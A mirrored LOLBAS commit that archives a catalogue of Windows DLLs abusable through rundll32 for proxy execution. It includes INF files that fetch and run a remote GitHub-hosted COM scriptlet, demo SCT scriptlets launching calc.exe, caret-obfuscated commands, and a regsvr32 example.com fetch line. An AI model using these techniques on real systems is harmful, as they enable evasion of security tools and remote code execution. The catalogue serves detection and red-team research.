mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-25 19:53:08 +02:00
Removed MD files, we only use the webportal from now on. All MD files moved to archive
This commit is contained in:
32
Archive-Old-Version/OSLibraries/Advpack.dll.md
Normal file
32
Archive-Old-Version/OSLibraries/Advpack.dll.md
Normal file
@@ -0,0 +1,32 @@
|
||||
## Advpack.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,
|
||||
Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified).
|
||||
|
||||
rundll32.exe advpack.dll,LaunchINFSection test.inf,,1,
|
||||
Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied).
|
||||
|
||||
rundll32.exe Advpack.dll,RegisterOCX calc.exe
|
||||
Launch executable by calling the RegisterOCX function.
|
||||
|
||||
rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
|
||||
Launch executable by calling the RegisterOCX function.
|
||||
|
||||
rundll32.exe Advpack.dll,RegisterOCX test.dll
|
||||
Launch a DLL payload by calling the RegisterOCX function.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
|
||||
* https://twitter.com/ItsReallyNick/status/967859147977850880
|
||||
* https://twitter.com/bohops/status/974497123101179904
|
||||
* https://twitter.com/moriarty_meng/status/977848311603380224
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\advpack.dll
|
||||
* c:\windows\sysWOW64\advpack.dll
|
||||
|
||||
* Notes: Thanks to Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL), Moriarty @moriarty_meng (RegisterOCX - Cmd)
|
||||
|
28
Archive-Old-Version/OSLibraries/Ieadvpack.dll.md
Normal file
28
Archive-Old-Version/OSLibraries/Ieadvpack.dll.md
Normal file
@@ -0,0 +1,28 @@
|
||||
## Ieadvpack.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe IEAdvpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,
|
||||
Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified).
|
||||
|
||||
rundll32.exe IEAdvpack.dll,LaunchINFSection test.inf,,1,
|
||||
Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied).
|
||||
|
||||
rundll32.exe IEAdvpack.dll,RegisterOCX calc.exe
|
||||
Launch executable by calling the RegisterOCX function.
|
||||
|
||||
rundll32.exe IEAdvpack.dll,RegisterOCX test.dll
|
||||
Launch a DLL payload by calling the RegisterOCX function.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/991695411902599168
|
||||
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
||||
* https://twitter.com/0rbz_/status/974472392012689408
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\ieadvpack.dll
|
||||
* c:\windows\sysWOW64\ieadvpack.dll
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (RegisterOCX - Cmd), Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL)
|
||||
|
22
Archive-Old-Version/OSLibraries/Ieframe.dll.md
Normal file
22
Archive-Old-Version/OSLibraries/Ieframe.dll.md
Normal file
@@ -0,0 +1,22 @@
|
||||
## Ieframe.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
|
||||
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
|
||||
|
||||
rundll32.exe ieframe.dll,OpenURL c:\\test\\calc-url-file.zz
|
||||
Renamed URL file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
|
||||
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
||||
* https://twitter.com/bohops/status/997690405092290561
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Ieframe.dll
|
||||
* c:\windows\sysWOW64\Ieframe.dll
|
||||
|
||||
* Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops
|
||||
|
17
Archive-Old-Version/OSLibraries/Mshtml.dll.md
Normal file
17
Archive-Old-Version/OSLibraries/Mshtml.dll.md
Normal file
@@ -0,0 +1,17 @@
|
||||
## Mshtml.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
|
||||
Invoke an HTML Application. Note - Pops a security warning and a print dialogue box.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/998567549670477824
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Mshtml.dll
|
||||
* c:\windows\sysWOW64\Mshtml.dll
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
14
Archive-Old-Version/OSLibraries/Payload/Advpack.inf
Normal file
14
Archive-Old-Version/OSLibraries/Payload/Advpack.inf
Normal file
@@ -0,0 +1,14 @@
|
||||
[version]
|
||||
Signature=$chicago$
|
||||
AdvancedINF=2.5
|
||||
|
||||
[DefaultInstall_SingleUser]
|
||||
UnRegisterOCXs=UnRegisterOCXSection
|
||||
|
||||
[UnRegisterOCXSection]
|
||||
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct
|
||||
|
||||
[Strings]
|
||||
AppAct = "SOFTWARE\Microsoft\Connection Manager"
|
||||
ServiceName="Yay"
|
||||
ShortSvcName="Yay"
|
44
Archive-Old-Version/OSLibraries/Payload/Advpack_calc.sct
Normal file
44
Archive-Old-Version/OSLibraries/Payload/Advpack_calc.sct
Normal file
@@ -0,0 +1,44 @@
|
||||
<?XML version="1.0"?>
|
||||
<scriptlet>
|
||||
|
||||
<registration
|
||||
description="Bandit"
|
||||
progid="Bandit"
|
||||
version="1.00"
|
||||
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
|
||||
>
|
||||
|
||||
<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
<!-- DFIR -->
|
||||
<!-- .sct files are downloaded and executed from a path like this -->
|
||||
<!-- Though, the name and extension are arbitary.. -->
|
||||
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
|
||||
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
|
||||
|
||||
|
||||
<!-- Proof Of Concept - Casey Smith @subTee -->
|
||||
<!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct -->
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
|
||||
]]>
|
||||
</script>
|
||||
</registration>
|
||||
|
||||
<public>
|
||||
<method name="Exec"></method>
|
||||
</public>
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
|
||||
function Exec()
|
||||
{
|
||||
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
|
||||
}
|
||||
|
||||
]]>
|
||||
</script>
|
||||
|
||||
</scriptlet>
|
14
Archive-Old-Version/OSLibraries/Payload/Ieadvpack.inf
Normal file
14
Archive-Old-Version/OSLibraries/Payload/Ieadvpack.inf
Normal file
@@ -0,0 +1,14 @@
|
||||
[version]
|
||||
Signature=$chicago$
|
||||
AdvancedINF=2.5
|
||||
|
||||
[DefaultInstall_SingleUser]
|
||||
UnRegisterOCXs=UnRegisterOCXSection
|
||||
|
||||
[UnRegisterOCXSection]
|
||||
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct
|
||||
|
||||
[Strings]
|
||||
AppAct = "SOFTWARE\Microsoft\Connection Manager"
|
||||
ServiceName="Yay"
|
||||
ShortSvcName="Yay"
|
44
Archive-Old-Version/OSLibraries/Payload/Ieadvpack_calc.sct
Normal file
44
Archive-Old-Version/OSLibraries/Payload/Ieadvpack_calc.sct
Normal file
@@ -0,0 +1,44 @@
|
||||
<?XML version="1.0"?>
|
||||
<scriptlet>
|
||||
|
||||
<registration
|
||||
description="Bandit"
|
||||
progid="Bandit"
|
||||
version="1.00"
|
||||
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
|
||||
>
|
||||
|
||||
<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
<!-- DFIR -->
|
||||
<!-- .sct files are downloaded and executed from a path like this -->
|
||||
<!-- Though, the name and extension are arbitary.. -->
|
||||
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
|
||||
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
|
||||
|
||||
|
||||
<!-- Proof Of Concept - Casey Smith @subTee -->
|
||||
<!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct -->
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
|
||||
]]>
|
||||
</script>
|
||||
</registration>
|
||||
|
||||
<public>
|
||||
<method name="Exec"></method>
|
||||
</public>
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
|
||||
function Exec()
|
||||
{
|
||||
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
|
||||
}
|
||||
|
||||
]]>
|
||||
</script>
|
||||
|
||||
</scriptlet>
|
17
Archive-Old-Version/OSLibraries/Pcwutl.dll.md
Normal file
17
Archive-Old-Version/OSLibraries/Pcwutl.dll.md
Normal file
@@ -0,0 +1,17 @@
|
||||
## Pcwutl.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe pcwutl.dll,LaunchApplication calc.exe
|
||||
Launch executable by calling the LaunchApplication function.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/harr0ey/status/989617817849876488
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Pcwutl.dll
|
||||
* c:\windows\sysWOW64\Pcwutl.dll
|
||||
|
||||
* Notes: Thanks to Matt harr0ey - @harr0ey
|
||||
|
23
Archive-Old-Version/OSLibraries/Setupapi.dll.md
Normal file
23
Archive-Old-Version/OSLibraries/Setupapi.dll.md
Normal file
@@ -0,0 +1,23 @@
|
||||
## Setupapi.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\temp\calc.inf
|
||||
Launch an executable file via the InstallHinfSection function and .inf file section directive.
|
||||
|
||||
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf
|
||||
Remote fetch and execute a COM Scriptlet by calling an information file directive.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/994742106852941825
|
||||
* https://twitter.com/subTee/status/951115319040356352
|
||||
* https://twitter.com/KyleHanslovan/status/911997635455852544
|
||||
* https://github.com/huntresslabs/evading-autoruns
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Setupapi.dll
|
||||
* c:\windows\sysWOW64\Setupapi.dll
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Executable), Kyle Hanslovan - @KyleHanslovan (COM Scriptlet), Huntress Labs - @HuntressLabs (COM Scriptlet), Casey Smith - @subTee (COM Scriptlet)
|
||||
|
22
Archive-Old-Version/OSLibraries/Shdocvw.dll.md
Normal file
22
Archive-Old-Version/OSLibraries/Shdocvw.dll.md
Normal file
@@ -0,0 +1,22 @@
|
||||
## Shdocvw.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
|
||||
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
|
||||
|
||||
rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.zz"
|
||||
Renamed URL file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
|
||||
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
||||
* https://twitter.com/bohops/status/997690405092290561
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Shdocvw.dll
|
||||
* c:\windows\sysWOW64\Shdocvw.dll
|
||||
|
||||
* Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops
|
||||
|
26
Archive-Old-Version/OSLibraries/Shell32.dll.md
Normal file
26
Archive-Old-Version/OSLibraries/Shell32.dll.md
Normal file
@@ -0,0 +1,26 @@
|
||||
## Shell32.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe shell32.dll,Control_RunDLL payload.dll
|
||||
Launch DLL payload.
|
||||
|
||||
rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
|
||||
Launch executable payload.
|
||||
|
||||
rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
|
||||
Launch executable payload with arguments.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/Hexacorn/status/885258886428725250
|
||||
* https://twitter.com/pabraeken/status/991768766898941953
|
||||
* https://twitter.com/mattifestation/status/776574940128485376
|
||||
* https://twitter.com/KyleHanslovan/status/905189665120149506
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\shell32.dll
|
||||
* c:\windows\sysWOW64\shell32.dll
|
||||
|
||||
* Notes: Thanks to Adam - @hexacorn (Control_RunDLL), Pierre-Alexandre Braeken - @pabraeken (ShellExec_RunDLL), Matt Graeber - @mattifestation (ShellExec_RunDLL), Kyle Hanslovan - @KyleHanslovan (ShellExec_RunDLL)
|
||||
|
22
Archive-Old-Version/OSLibraries/Syssetup.dll.md
Normal file
22
Archive-Old-Version/OSLibraries/Syssetup.dll.md
Normal file
@@ -0,0 +1,22 @@
|
||||
## Syssetup.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.INF
|
||||
Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
|
||||
|
||||
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\\test\\shady.inf
|
||||
Remote fetch and execute a COM Scriptlet by calling an information file directive.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/994392481927258113
|
||||
* https://twitter.com/harr0ey/status/975350238184697857
|
||||
* https://twitter.com/bohops/status/975549525938135040
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\Syssetup.dll
|
||||
* c:\windows\sysWOW64\Syssetup.dll
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Execute), Matt harr0ey - @harr0ey (Execute), Jimmy - @bohops (COM Scriptlet)
|
||||
|
36
Archive-Old-Version/OSLibraries/Url.dll.md
Normal file
36
Archive-Old-Version/OSLibraries/Url.dll.md
Normal file
@@ -0,0 +1,36 @@
|
||||
## Url.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe url.dll,OpenURL "C:\\test\\calc.hta"
|
||||
Launch a HTML application payload by calling OpenURL.
|
||||
|
||||
rundll32.exe url.dll,OpenURL "C:\\test\\calc.url"
|
||||
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
|
||||
|
||||
rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
|
||||
Launch an executable payload by calling OpenURL.
|
||||
|
||||
rundll32.exe url.dll,FileProtocolHandler calc.exe
|
||||
Launch an executable payload by calling FileProtocolHandler.
|
||||
|
||||
rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
|
||||
Launch a HTML application payload by calling FileProtocolHandler.
|
||||
|
||||
rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
|
||||
Launch an executable payload by calling FileProtocolHandler.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
||||
* https://twitter.com/bohops/status/974043815655956481
|
||||
* https://twitter.com/DissectMalware/status/995348436353470465
|
||||
* https://twitter.com/yeyint_mth/status/997355558070927360
|
||||
* https://twitter.com/Hexacorn/status/974063407321223168
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\url.dll
|
||||
* c:\windows\sysWOW64\url.dll
|
||||
|
||||
* Notes: Thanks to Jimmy - @bohops (OpenURL), Adam - @hexacorn (OpenURL), Malwrologist - @DissectMalware (FileProtocolHandler - HTA), r0lan - @yeyint_mth (Obfuscation)
|
||||
|
21
Archive-Old-Version/OSLibraries/Zipfldr.dll.md
Normal file
21
Archive-Old-Version/OSLibraries/Zipfldr.dll.md
Normal file
@@ -0,0 +1,21 @@
|
||||
## Zipfldr.dll
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rundll32.exe zipfldr.dll,RouteTheCall calc.exe
|
||||
Launch an executable payload by calling RouteTheCall.
|
||||
|
||||
rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
|
||||
Launch an executable payload by calling RouteTheCall.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/moriarty_meng/status/977848311603380224
|
||||
* https://twitter.com/bohops/status/997896811904929792
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\zipfldr.dll
|
||||
* c:\windows\sysWOW64\zipfldr.dll
|
||||
|
||||
* Notes: Thanks to Moriarty - @moriarty_meng (Execute), r0lan - @yeyint_mth (Obfuscation)
|
||||
|
Reference in New Issue
Block a user